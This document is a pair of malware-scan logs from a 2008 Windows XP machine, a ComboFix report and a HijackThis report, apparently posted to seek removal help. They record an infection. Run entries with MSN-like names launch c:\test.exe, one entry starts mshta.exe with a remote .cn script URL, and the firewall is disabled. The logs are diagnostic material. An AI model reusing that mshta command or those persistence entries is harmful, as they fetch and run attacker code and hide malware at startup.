The Combofix.txt Log follows:
ComboFix 08-11-07.01 - Cuchens 2008-11-08 22:29:53.2 - NTFSx86
Microsoft Windows XP Home Edition 5.1.2600.2.1252.1.1033.18.1082 [GMT -6:00]
Running from: c:\documents and settings\[removed]\desktop\ComboFix.exe
* Created a new restore point
.
((((((((((((((((((((((((( Files Created from 2008-10-09 to 2008-11-09 )))))))))))))))))))))))))))))))
.
2008-11-08 20:55 . 2008-11-08 20:55 d——– c:\program files\Malwarebytes' Anti-Malware
2008-11-08 20:55 . 2008-10-22 16:10 38,496 –a—— c:\windows\system32\drivers\mbamswissarmy.sys
2008-11-08 20:55 . 2008-10-22 16:10 15,504 –a—— c:\windows\system32\drivers\mbam.sys
2008-11-08 20:52 . 2008-11-08 20:52 d——– c:\documents and settings\Administrator\Application Data\Malwarebytes
2008-11-07 13:28 . 2008-11-07 13:28 d——– c:\program files\Trend Micro
2008-11-04 02:59 . 2008-11-04 02:59 d——– c:\documents and settings\Cuchens\Application Data\Malwarebytes
2008-11-04 02:59 . 2008-11-04 02:59 d——– c:\documents and settings\All Users\Application Data\Malwarebytes
2008-11-02 18:58 . 2008-11-02 18:58 d——– c:\documents and settings\Cuchens\Application Data\Comodo
2008-11-01 23:10 . 2008-11-01 23:10 d——– c:\program files\COMODO
2008-11-01 23:10 . 2008-11-02 18:38 d——– c:\documents and settings\All Users\Application Data\comodo
2008-11-01 23:10 . 2008-11-01 23:10 143,096 –a—— c:\windows\system32\guard32.dll
2008-11-01 23:10 . 2008-11-01 23:10 99,856 –a—— c:\windows\system32\drivers\cmdguard.sys
2008-11-01 23:10 . 2008-11-01 23:10 31,504 –a—— c:\windows\system32\drivers\cmdhlp.sys
2008-11-01 01:44 . 2008-11-01 01:44 d——– c:\documents and settings\Administrator\Application Data\SUPERAntiSpyware.com
2008-11-01 00:52 . 2008-11-01 00:52 d——– c:\documents and settings\Administrator
2008-10-30 04:41 . 2008-10-30 04:41 d——– c:\program files\Kaspersky Lab
2008-10-30 04:36 . 2008-10-30 04:36 d——– c:\documents and settings\All Users\Application Data\Kaspersky Lab Setup Files
2008-10-30 01:13 . 2008-10-30 01:13 d——– c:\program files\SUPERAntiSpyware
2008-10-30 01:13 . 2008-10-30 01:13 d——– c:\documents and settings\Cuchens\Application Data\SUPERAntiSpyware.com
2008-10-30 01:13 . 2008-10-30 01:13 d——– c:\documents and settings\All Users\Application Data\SUPERAntiSpyware.com
2008-10-29 00:57 . 2008-10-29 00:58 d——– c:\documents and settings\All Users\Application Data\Lavasoft
2008-10-29 00:56 . 2008-11-07 02:14 d——– c:\program files\Common Files\Wise Installation Wizard
2008-10-28 02:46 . 2008-07-08 12:54 148,496 –a—— c:\windows\system32\drivers\51474932.sys
2008-10-28 02:37 . 2008-11-08 22:12 117,217,312 –ahs—- c:\windows\system32\drivers\fidbox.dat
2008-10-28 02:37 . 2008-11-08 22:12 1,374,716 –ahs—- c:\windows\system32\drivers\fidbox.idx
2008-10-28 02:36 . 2008-07-08 12:54 148,496 –a—— c:\windows\system32\drivers\79742459.sys
2008-10-28 02:27 . 2004-03-09 13:00 1,081,616 –a—— c:\windows\system32\MSCOMCTL.OCX
2008-10-28 02:27 . 1998-06-24 12:00 244,024 –a—— c:\windows\system32\MSFLXGRD.OCX
2008-10-28 02:27 . 2000-05-22 16:00 203,976 –a—— c:\windows\system32\richtx32.ocx
2008-10-28 02:27 . 1998-06-24 12:00 140,096 –a—— c:\windows\system32\COMDLG32.OCX
2008-10-28 02:27 . 2004-03-09 12:00 132,880 –a—— c:\windows\system32\MSINET.OCX
2008-10-28 02:27 . 2000-04-03 22:05 118,784 –a—— c:\windows\system32\msstdfmt.dll
2008-10-28 02:03 . 2008-10-28 02:19 199 –a—— c:\windows\wininit.ini
2008-10-27 18:39 . 2008-10-27 18:39 d——– c:\program files\MSXML 4.0
2008-10-27 18:37 . 2008-10-28 12:34 d——– c:\windows\system32\CatRoot_bak
2008-10-27 03:27 . 2008-08-28 04:04 333,056 —–c— c:\windows\system32\dllcache\srv.sys
2008-10-27 03:27 . 2008-06-13 07:10 272,128 —–c— c:\windows\system32\dllcache\bthport.sys
2008-10-27 03:26 . 2008-08-14 04:00 2,180,352 —–c— c:\windows\system32\dllcache\ntoskrnl.exe
2008-10-27 03:26 . 2008-08-14 03:58 2,136,064 —–c— c:\windows\system32\dllcache\ntkrnlmp.exe
2008-10-27 03:26 . 2008-08-14 03:22 2,057,728 —–c— c:\windows\system32\dllcache\ntkrnlpa.exe
2008-10-27 03:26 . 2008-08-14 03:22 2,015,744 —–c— c:\windows\system32\dllcache\ntkrpamp.exe
2008-10-27 03:26 . 2008-09-15 05:57 1,846,016 —–c— c:\windows\system32\dllcache\win32k.sys
2008-10-27 03:25 . 2008-04-11 12:50 683,520 —–c— c:\windows\system32\dllcache\inetcomm.dll
2008-10-27 03:25 . 2008-05-01 08:30 331,776 —–c— c:\windows\system32\dllcache\msadce.dll
2008-10-27 03:24 . 2008-10-15 10:57 332,800 —–c— c:\windows\system32\dllcache\netapi32.dll
2008-10-27 01:56 . 2008-10-30 04:40 d——– c:\program files\Spybot - Search & Destroy
2008-10-27 01:56 . 2008-10-30 04:51 d——– c:\documents and settings\All Users\Application Data\Spybot - Search & Destroy
2008-10-27 01:31 . 2008-10-27 01:31 d——– C:\msn
2008-10-27 01:31 . 2008-10-27 01:31 194,048 –a—— C:\test.exe
2008-10-27 01:30 . 2008-11-01 22:35 111 –a—— C:\testflo.bat
2008-10-27 01:30 . 2008-11-01 22:35 111 –a—— C:\testfile.bat
2008-10-26 01:16 . 2008-10-26 01:16 d——– c:\documents and settings\Cuchens\Application Data\GlarySoft
2008-10-25 04:29 . 2008-10-25 04:29 d——– c:\documents and settings\Cuchens\Application Data\Desktop Maestro
2008-10-25 03:15 . 2008-10-25 19:08 d——– c:\program files\Desktop Maestro
2008-10-25 03:14 . 2008-10-28 09:09 d-a—— c:\documents and settings\All Users\Application Data\TEMP
.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2008-11-09 04:19 ——— d—–w c:\documents and settings\Cuchens\Application Data\OpenOffice.org2
2008-11-07 08:24 ——— d—–w c:\program files\Sony Corporation
2008-11-03 06:47 ——— d—–w c:\program files\EPSON Print CD
2008-10-26 07:16 ——— d—–w c:\program files\dell
2008-10-25 08:39 ——— d–h–w c:\program files\InstallShield Installation Information
2008-09-15 11:57 1,846,016 —-a-w c:\windows\system32\win32k.sys
2008-08-20 05:38 659,456 —-a-w c:\windows\system32\wininet.dll
2008-08-14 10:00 2,180,352 —-a-w c:\windows\system32\ntoskrnl.exe
2008-08-14 09:22 2,057,728 —-a-w c:\windows\system32\ntkrnlpa.exe
2006-11-26 00:38 284 —-a-w c:\documents and settings\Cuchens\Application Data\ViewerApp.dat
.
((((((((((((((((((((((((((((( snapshot@2008-11-01_23.43.50.57 )))))))))))))))))))))))))))))))))))))))))
.
- 2005-10-21 01:02:28 163,328 —-a-w c:\windows\ERDNT\Hiv-backup\ERDNT.EXE
+ 2005-10-21 02:02:28 163,328 —-a-w c:\windows\ERDNT\Hiv-backup\ERDNT.EXE
- 2000-08-31 13:00:00 28,672 —-a-w c:\windows\NIRCMD.exe
+ 2000-08-31 14:00:00 28,672 —-a-w c:\windows\NIRCMD.exe
- 2000-08-31 13:00:00 161,792 —-a-w c:\windows\SWREG.exe
+ 2000-08-31 14:00:00 161,792 —-a-w c:\windows\SWREG.exe
+ 2008-11-02 05:10:29 79,504 —-a-w c:\windows\system32\drivers\inspect.sys
- 2008-10-28 09:02:47 40,394 —-a-w c:\windows\system32\perfc009.dat
+ 2008-11-03 00:41:45 40,394 —-a-w c:\windows\system32\perfc009.dat
- 2008-10-28 09:02:47 312,172 —-a-w c:\windows\system32\perfh009.dat
+ 2008-11-03 00:41:45 312,172 —-a-w c:\windows\system32\perfh009.dat
.
((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}"="c:\program files\Common Files\Ahead\Lib\NMBgMonitor.exe" [2007-06-27 152872]
"SpybotSD TeaTimer"="c:\program files\Spybot - Search & Destroy\TeaTimer.exe" [2008-09-16 1833296]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"NvCplDaemon"="c:\windows\System32\NvCpl.dll" [2005-09-08 7118848]
"NeroFilterCheck"="c:\program files\Common Files\Ahead\Lib\NeroCheck.exe" [2007-03-01 153136]
"type32"="c:\program files\Microsoft IntelliType Pro\type32.exe" [2004-03-18 184320]
"IntelliPoint"="c:\program files\Microsoft IntelliPoint\point32.exe" [2004-03-18 212992]
"SunJavaUpdateSched"="c:\program files\Java\jre1.6.0_07\bin\jusched.exe" [2008-06-10 144784]
"Acrobat Assistant 8.0"="c:\program files\Adobe\Acrobat 8.0\Acrobat\Acrotray.exe" [2008-01-11 623992]
"Adobe_ID0EYTHM"="c:\progra~1\COMMON~1\Adobe\ADOBEV~1\Server\bin\VERSIO~2.EXE" [2007-03-20 1884160]
"COMODO Internet Security"="c:\program files\COMODO\COMODO Internet Security\cfp.exe" [2008-11-01 1797880]
"nwiz"="nwiz.exe" [2006-10-21 c:\windows\system32\nwiz.exe]
"NvMediaCenter"="NvMCTray.dll" [2005-09-08 c:\windows\system32\nvmctray.dll]
[HKEY_CURRENT_USER\software\microsoft\windows\Currentversion\policies\explorer\Run]
"Msn"="c:\test.exe" [2008-10-27 194048]
"MsnHost"="c:\test.exe" [2008-10-27 194048]
"MsnLoad"="c:\test.exe" [2008-10-27 194048]
"MsnConvert"="c:\test.exe" [2008-10-27 194048]
"MsnMessendger"="c:\test.exe" [2008-10-27 194048]
"test"="mshta.exe" [2004-08-04 c:\windows\system32\mshta.exe]
c:\documents and settings\Cuchens\Start Menu\Programs\Startup\
OpenOffice.org 2.4.lnk - c:\program files\OpenOffice.org 2.4\program\quickstart.exe [2008-01-21 393216]
PowerReg Scheduler V3.exe [2008-07-02 225280]
[hkey_local_machine\software\microsoft\windows\currentversion\explorer\ShellExecuteHooks]
"{5AE067D3-9AFB-48E0-853A-EBB7F4A000DA}"= "c:\program files\SUPERAntiSpyware\SASSEH.DLL" [2008-05-13 77824]
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\windows]
"appinit_dlls"= c:\windows\system32\guard32.dll
[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile]
"EnableFirewall"= 0 (0x0)
[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
"%windir%\\system32\\sessmgr.exe"=
"c:\\WINDOWS\\system32\\DKabcoms.exe"=
"c:\\Program Files\\Bonjour\\mDNSResponder.exe"=
"c:\\Program Files\\Common Files\\Adobe\\Adobe Version Cue CS3\\Server\\bin\\VersionCueCS3.exe"=
[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\GloballyOpenPorts\List]
"3703:TCP"= 3703:TCP:Adobe Version Cue CS3 Server
"3704:TCP"= 3704:TCP:Adobe Version Cue CS3 Server
"50900:TCP"= 50900:TCP:Adobe Version Cue CS3 Server
"50901:TCP"= 50901:TCP:Adobe Version Cue CS3 Server
R1 cmdGuard;COMODO Internet Security Sandbox Driver;c:\windows\system32\DRIVERS\cmdguard.sys [2008-11-01 99856]
R1 cmdHlp;COMODO Internet Security Helper Driver;c:\windows\system32\DRIVERS\cmdhlp.sys [2008-11-01 31504]
R1 is-F14F3drv;is-F14F3drv;c:\windows\system32\DRIVERS\79742459.sys [2008-07-08 148496]
R1 is-OFLAOdrv;is-OFLAOdrv;c:\windows\system32\DRIVERS\51474932.sys [2008-07-08 148496]
S3 dkab_device;dkab_device;c:\windows\System32\DKabcoms.exe [2005-05-23 487424]
S3 tj2knd5;Terayon Cable Modem (NDIS);c:\windows\system32\DRIVERS\tj2knd5.sys [2002-10-13 17616]
S3 tj2kunic;Terayon Cable Modem (WDM);c:\windows\system32\DRIVERS\tj2kunic.sys [2002-10-13 69680]
.
.
——- Supplementary Scan ——-
.
FireFox -: Profile - c:\documents and settings\Cuchens\Application Data\Mozilla\Firefox\Profiles\ef0wf28n.default\
FireFox -: prefs.js - STARTUP.HOMEPAGE - www.google.com
.
**************************************************************************
catchme 0.3.1367 W2K/XP/Vista - rootkit/stealth malware detector by Gmer,
http://www.gmer.net
Rootkit scan 2008-11-08 22:36:33
Windows 5.1.2600 Service Pack 2 NTFS
scanning hidden processes …
scanning hidden autostart entries …
scanning hidden files …
**************************************************************************
.
——————— DLLs Loaded Under Running Processes ———————
PROCESS: c:\windows\system32\winlogon.exe
-> c:\windows\system32\guard32.dll
PROCESS: c:\windows\system32\lsass.exe
-> c:\windows\system32\guard32.dll
.
Completion time: 2008-11-08 22:40:26
ComboFix-quarantined-files.txt 2008-11-09 04:39:13
ComboFix2.txt 2008-11-02 04:45:51
Pre-Run: 13,525,168,128 bytes free
Post-Run: 13,799,829,504 bytes free
169 — E O F — 2008-11-07 08:46:21
The HJT Log:
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 22:46, on 2008-11-08
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)
Boot mode: Normal
Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Microsoft IntelliType Pro\type32.exe
C:\Program Files\Microsoft IntelliPoint\point32.exe
C:\Program Files\Java\jre1.6.0_07\bin\jusched.exe
C:\Program Files\Adobe\Acrobat 8.0\Acrobat\Acrotray.exe
C:\Program Files\COMODO\COMODO Internet Security\cfp.exe
C:\Program Files\Common Files\Ahead\Lib\NMBgMonitor.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Program Files\COMODO\COMODO Internet Security\cmdagent.exe
C:\Program Files\OpenOffice.org 2.4\program\soffice.exe
C:\Program Files\OpenOffice.org 2.4\program\soffice.BIN
C:\Program Files\Common Files\Ahead\Lib\NMIndexingService.exe
C:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe
C:\Program Files\Common Files\Ahead\Lib\NMIndexStoreSvr.exe
C:\WINDOWS\system32\wscntfy.exe
C:\WINDOWS\system32\wuauclt.exe
C:\WINDOWS\explorer.exe
C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
C:\Program Files\Internet Explorer\IEXPLORE.EXE
C:\test.exe
C:\test.exe
C:\test.exe
C:\test.exe
C:\Program Files\Trend Micro\HijackThis\HijackThis.exe
C:\test.exe
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = *.local
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
O2 - BHO: ContributeBHO Class - {074C1DC5-9320-4A9A-947D-C042949C6216} - C:\Program Files\Adobe\/Adobe Contribute CS3/contributeieplugin.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll
O2 - BHO: Adobe PDF Conversion Toolbar Helper - {AE7CD045-E861-484f-8273-0445EE161910} - C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll
O3 - Toolbar: Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll
O3 - Toolbar: Contribute Toolbar - {517BDDE4-E3A7-4570-B21E-2B52B6139FC7} - C:\Program Files\Adobe\/Adobe Contribute CS3/contributeieplugin.dll
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\System32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [nwiz] nwiz.exe /installquiet
O4 - HKLM\..\Run: [NvMediaCenter] RunDLL32.exe NvMCTray.dll,NvTaskbarInit
O4 - HKLM\..\Run: [NeroFilterCheck] C:\Program Files\Common Files\Ahead\Lib\NeroCheck.exe
O4 - HKLM\..\Run: [type32] "C:\Program Files\Microsoft IntelliType Pro\type32.exe"
O4 - HKLM\..\Run: [IntelliPoint] "C:\Program Files\Microsoft IntelliPoint\point32.exe"
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre1.6.0_07\bin\jusched.exe"
O4 - HKLM\..\Run: [Acrobat Assistant 8.0] "C:\Program Files\Adobe\Acrobat 8.0\Acrobat\Acrotray.exe"
O4 - HKLM\..\Run: [Adobe_ID0EYTHM] C:\PROGRA~1\COMMON~1\Adobe\ADOBEV~1\Server\bin\VERSIO~2.EXE
O4 - HKLM\..\Run: [COMODO Internet Security] "C:\Program Files\COMODO\COMODO Internet Security\cfp.exe" -h
O4 - HKCU\..\Run: [BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}] "C:\Program Files\Common Files\Ahead\Lib\NMBgMonitor.exe"
O4 - HKCU\..\Run: [SpybotSD TeaTimer] C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
O4 - HKCU\..\Policies\Explorer\Run: [test] mshta.exe
http://dcz9ubei212vp3nrca5i.cn/s_t.php
O4 - HKCU\..\Policies\Explorer\Run: [Msn] c:\test.exe
O4 - HKCU\..\Policies\Explorer\Run: [MsnHost] c:\test.exe
O4 - HKCU\..\Policies\Explorer\Run: [MsnLoad] c:\test.exe
O4 - HKCU\..\Policies\Explorer\Run: [MsnConvert] c:\test.exe
O4 - HKCU\..\Policies\Explorer\Run: [MsnMessendger] c:\test.exe
O4 - Startup: OpenOffice.org 2.4.lnk = C:\Program Files\OpenOffice.org 2.4\program\quickstart.exe
O4 - Startup: PowerReg Scheduler V3.exe
O8 - Extra context menu item: Append to existing PDF - res://C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
O8 - Extra context menu item: Convert link target to Adobe PDF - res://C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
O8 - Extra context menu item: Convert link target to existing PDF - res://C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
O8 - Extra context menu item: Convert selected links to Adobe PDF - res://C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIECaptureSelLinks.html
O8 - Extra context menu item: Convert selected links to existing PDF - res://C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIEAppendSelLinks.html
O8 - Extra context menu item: Convert selection to Adobe PDF - res://C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
O8 - Extra context menu item: Convert selection to existing PDF - res://C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
O8 - Extra context menu item: Convert to Adobe PDF - res://C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) -
http://www.update.microsoft.com/windowsupd…b?1217660324250
O20 - AppInit_DLLs: C:\WINDOWS\system32\guard32.dll
O23 - Service: Adobe Version Cue CS3 - Adobe Systems Incorporated - C:\Program Files\Common Files\Adobe\Adobe Version Cue CS3\Server\bin\VersionCueCS3.exe
O23 - Service: ##Id_String1.6844F930_1628_4223_B5CC_5BB94B879762## (Bonjour Service) - Apple Computer, Inc. - C:\Program Files\Bonjour\mDNSResponder.exe
O23 - Service: COMODO Internet Security Helper Service (cmdAgent) - Unknown owner - C:\Program Files\COMODO\COMODO Internet Security\cmdagent.exe
O23 - Service: dkab_device - Dell - C:\WINDOWS\System32\DKabcoms.exe
O23 - Service: FLEXnet Licensing Service - Macrovision Europe Ltd. - C:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe
O23 - Service: NBService - Nero AG - C:\Program Files\Nero\Nero 7\Nero BackItUp\NBService.exe
O23 - Service: NMIndexingService - Nero AG - C:\Program Files\Common Files\Ahead\Lib\NMIndexingService.exe
O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\System32\nvsvc32.exe
–
End of file - 7429 bytes